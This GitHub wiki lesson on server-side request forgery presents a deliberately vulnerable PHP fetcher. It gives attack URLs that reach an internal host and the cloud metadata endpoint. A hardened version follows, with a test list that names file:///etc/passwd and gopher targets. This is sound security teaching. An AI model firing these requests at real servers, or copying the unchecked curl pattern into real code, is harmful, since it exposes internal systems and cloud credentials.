SSRF 01 - yujitounai/helloworld GitHub Wiki

SSRF

Vulnerable source code (PHP)

```php
<?php
// Deliberately vulnerable: the url parameter goes straight into curl with no
// scheme, host or address check, and the full response body is echoed back.
if (isset($_GET['url'])){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $_GET['url']);      // attacker-controlled URL
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $html = curl_exec($ch);
    echo "<xmp>";
    echo $html;                                        // response reflected to the attacker
    echo "</xmp>";
}
?>
<div class="box">
<form method="get" action="">Please enter image url
<input name="url" type="text">
<input type="submit">
</form>
</div>
```

Attack method

Because the server fetches whatever URL it is given and reflects the body inside `<xmp>`, the attacker can use it to read hosts that are reachable from the server but not from the outside. First, a host on the server's internal network:

ssrf-01.php?url=http://192.168.5.1/

Second, the cloud instance metadata endpoint (the link-local address 169.254.169.254 used by AWS EC2 and other providers), which here returns the instance hostname:

ssrf-01.php?url=http://169.254.169.254/latest/meta-data/hostname
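The hardened counterpart to the snippet above, as an added example that is not part of the original wiki page: it restricts the scheme to http/https, resolves the hostname itself, rejects private, loopback and link-local addresses (which covers both attack URLs), and pins curl to the address it checked so a DNS-rebinding answer cannot swap in 169.254.169.254 between the check and the fetch. The function names `is_public_ip`, `resolve_public_host` and `fetch_image_url` and the size and timeout values are assumptions of this example.

```php
<?php
// Added example (not the wiki's code): a fetch that refuses internal targets.

function is_public_ip(string $ip): bool {
    // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16, fc00::/7.
    // NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1, ::, ::ffff:0:0/96, fe80::/10.
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

function resolve_public_host(string $host): ?string {
    // Resolve once here (IPv4 only; AAAA records would need dns_get_record),
    // check every returned address, and return the one we will pin curl to.
    $addrs = gethostbynamel($host);
    if ($addrs === false || $addrs === []) {
        return null;
    }
    foreach ($addrs as $ip) {
        if (!is_public_ip($ip)) {
            return null;            // any internal answer rejects the whole host
        }
    }
    return $addrs[0];
}

function fetch_image_url(string $url): ?string {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;                // no file://, gopher://, dict:// etc.
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;                // http://trusted@169.254.169.254/ style confusion
    }
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    $ip = resolve_public_host($parts['host']);
    if ($ip === null) {
        return null;
    }

    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,   // a 302 to http://169.254.169.254/ would bypass the check
        CURLOPT_RESOLVE        => ["{$parts['host']}:{$port}:{$ip}"], // pin to the checked address
        CURLOPT_CONNECTTIMEOUT => 5,       // assumed limits
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => 5 * 1024 * 1024,
    ]);
    $body = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    if ($body === false || $status !== 200) {
        return null;
    }
    return $body;
}

// Constructed check table: every one of these is refused before any
// connection is opened, so this part runs offline.
if (PHP_SAPI === 'cli') {
    $blocked = [
        'http://192.168.5.1/',
        'http://169.254.169.254/latest/meta-data/hostname',
        'http://127.0.0.1:8080/admin',
        'file:///etc/passwd',
        'gopher://127.0.0.1:25/',
    ];
    foreach ($blocked as $u) {
        echo $u, ' => ', fetch_image_url($u) === null ? 'blocked' : 'ALLOWED', PHP_EOL;
    }
}
```

Two caveats a reviewer would raise. The address check runs on what the resolver returns, not on the URL string, so host encodings that curl itself would accept are normalized before being compared; still, a literal IPv6 host such as `[::1]` is only rejected here because `gethostbynamel` cannot resolve it, and a real deployment should look up AAAA records and validate them with the same flags. Redirects are disabled outright because the check is done once, up front; if redirects are needed, each `Location` must go through `fetch_image_url` again rather than `CURLOPT_FOLLOWLOCATION`.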
